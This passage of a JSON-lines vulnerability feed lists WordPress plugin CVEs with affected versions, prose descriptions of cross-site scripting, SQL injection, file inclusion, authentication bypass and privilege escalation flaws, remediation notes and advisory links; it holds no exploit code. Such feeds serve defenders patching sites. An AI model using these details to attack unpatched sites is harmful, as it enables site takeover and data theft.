page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.0\\\/includes\\\/msp-shortcodes.php#L526\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.0\\\/includes\\\/msp-shortcodes.php#L526\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1dcafe1-bdba-4476-bcc7-ad844da38a01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1dcafe1-bdba-4476-bcc7-ad844da38a01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5190","slug":"browse-as","versionImpact":"0.2","description":"The Browse As plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.2. This is due to incorrect authentication checking in the 'IS_BA_Browse_As::notice' function with the 'is_ba_original_user_COOKIEHASH' cookie value. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator, if they have access to the user id.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5722b0-0d54-4c44-b168-a886da1077cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5722b0-0d54-4c44-b168-a886da1077cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6756","slug":"ultimate-addons-for-contact-form-7","versionImpact":"3.5.21","description":"The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's UACF7_CUSTOM_FIELDS shortcode in all versions up to, and including, 3.5.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/tags\\\/3.5.21\\\/addons\\\/dynamic-text\\\/inc\\\/shortcode.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/tags\\\/3.5.21\\\/addons\\\/dynamic-text\\\/inc\\\/shortcode.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319449\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319449\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b839658-c472-40f0-855f-7201baeb790f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b839658-c472-40f0-855f-7201baeb790f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23670","slug":"fancy-facebook-comments","versionImpact":"1.2.10","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in Team Heateor Fancy Comments WordPress plugin <= 1.2.10 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fancy-facebook-comments\\\/wordpress-fancy-comments-wordpress-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fancy-facebook-comments\\\/wordpress-fancy-comments-wordpress-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2435","slug":"blog-in-blog","versionImpact":"1.1.1","description":"The Blog-in-Blog plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.1 via a shortcode attribute. This allows editor-level, and above, attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d53161ad-cc5f-4433-b288-a8095cdfd7db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d53161ad-cc5f-4433-b288-a8095cdfd7db?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L153\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-23508","slug":"pdf-poster","versionImpact":"2.1.17","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins PDF Poster \u2013 PDF Embedder Plugin for WordPress allows Reflected XSS.This issue affects PDF Poster \u2013 PDF Embedder Plugin for WordPress: from n\/a through 2.1.17.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pdf-poster\\\/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pdf-poster\\\/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1133","slug":"tutor","versionImpact":"2.6.0","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of restricted Q&A content due to a missing capability check when interacting with questions in all versions up to, and including, 2.6.0. This makes it possible for authenticated attackers, with subscriber access or higher, to interact with questions in courses in which they are not enrolled including private courses.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5473","slug":"simple-photoswipe","versionImpact":"0.1","description":"The Simple Photoswipe WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c70cfc4-5759-469a-a6a3-510c405bd28a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c70cfc4-5759-469a-a6a3-510c405bd28a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7766","slug":"adicons","versionImpact":"1.2","description":"The Adicon Server WordPress plugin through 1.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca4d629e-ab55-4e5d-80c9-fddbc9c97259\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca4d629e-ab55-4e5d-80c9-fddbc9c97259\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8870","slug":"mailchimp-wp","versionImpact":"2.5.6","description":"The Forms for Mailchimp by Optin Cat \u2013 Grow Your MailChimp List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86389489-9f9d-479b-b351-19f25166fc91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86389489-9f9d-479b-b351-19f25166fc91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-53788","slug":"uber-grid","versionImpact":"1.1.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Portfoliohub WordPress Portfolio Builder \u2013 Portfolio Gallery allows Stored XSS.This issue affects WordPress Portfolio Builder \u2013 Portfolio Gallery: from n\/a through 1.1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uber-grid\\\/vulnerability\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uber-grid\\\/vulnerability\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12288","slug":"simple-add-pages-or-posts","versionImpact":"2.0.0","description":"The Simple add pages or posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php#L243\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php#L243\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/506f101c-ffec-415d-92dc-99cb7384af95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/506f101c-ffec-415d-92dc-99cb7384af95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13220","slug":"google-map-professional","versionImpact":"1.0","description":"The WordPress Google Map Professional (Map In Your Language) WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ef27b4-e88f-46ec-9b3f-0a3e16d6f82e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ef27b4-e88f-46ec-9b3f-0a3e16d6f82e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13731","slug":"alert-box-block","versionImpact":"1.1.2","description":"The Alert Box Block \u2013 Display notice\/alerts in the front end. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Alert Box block in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alert-box-block\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alert-box-block\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d63cd13e-4a16-483f-8165-6c8090ceebab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d63cd13e-4a16-483f-8165-6c8090ceebab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4944","slug":"lastudio-element-kit","versionImpact":"1.5.2","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Compare and Google Maps widgets in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68ae8404-6dfa-4b13-b2a6-bd4554f1043f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68ae8404-6dfa-4b13-b2a6-bd4554f1043f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6934","slug":"opal-estate-pro","versionImpact":"1.7.5","description":"The Opal Estate Pro \u2013 Property Management and Submission plugin for WordPress, used by the FullHouse - Real Estate Responsive WordPress Theme, is vulnerable to privilege escalation via in all versions up to, and including, 1.7.5. This is due to a lack of role restriction during registration in the 'on_regiser_user' function. This makes it possible for unauthenticated attackers to arbitrarily choose the role, including the Administrator role, assigned when registering.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate-pro\\\/trunk\\\/inc\\\/user\\\/class-opalestate-user.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/fullhouse-real-estate-responsive-wordpress-theme\\\/16179481\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/fullhouse-real-estate-responsive-wordpress-theme\\\/16179481\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7b75a4-67b4-4347-91a6-dbf98da5ceaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7b75a4-67b4-4347-91a6-dbf98da5ceaf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25040","slug":"shortcodes-ultimate","versionImpact":"5.12.6","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Vova Anokhin WordPress Shortcodes Plugin \u2014 Shortcodes Ultimate plugin <= 5.12.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/shortcodes-ultimate\\\/wordpress-shortcodes-ultimate-plugin-5-12-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/shortcodes-ultimate\\\/wordpress-shortcodes-ultimate-plugin-5-12-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22159","slug":"bulk-editor","versionImpact":"1.0.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional allows Reflected XSS.This issue affects WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional: from n\/a through 1.0.8.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1130","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.5.6","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_read() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as read.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6708","slug":"svg-support","versionImpact":"2.5.5","description":"The SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG upload feature in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping, even when the 'Sanitize SVG while uploading' feature is enabled. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that successful exploitation of this vulnerability requires the administrator to allow author-level users to upload SVG files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72bcfd2a-6803-4073-8fa9-62bcf0a10571?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72bcfd2a-6803-4073-8fa9-62bcf0a10571?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/svg-support.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/svg-support.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/functions\\\/attachment.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svg-support\\\/trunk\\\/functions\\\/attachment.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9933","slug":"watchtowerhq","versionImpact":"3.9.6","description":"The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50349086-e7b0-4f73-8722-1367cc05180e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50349086-e7b0-4f73-8722-1367cc05180e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watchtowerhq\\\/tags\\\/3.9.6\\\/src\\\/Password_Less_Access.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watchtowerhq\\\/tags\\\/3.9.6\\\/src\\\/Password_Less_Access.php#L56\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12458","slug":"smart-popup-blaster","versionImpact":"1.4.3","description":"The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-popup-blaster\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-popup-blaster\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13219","slug":"policy-genius","versionImpact":"2.0.4","description":"The Privacy Policy Genius WordPress plugin through 2.0.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad02238-dce1-48ce-986f-fef36b110b2d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad02238-dce1-48ce-986f-fef36b110b2d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
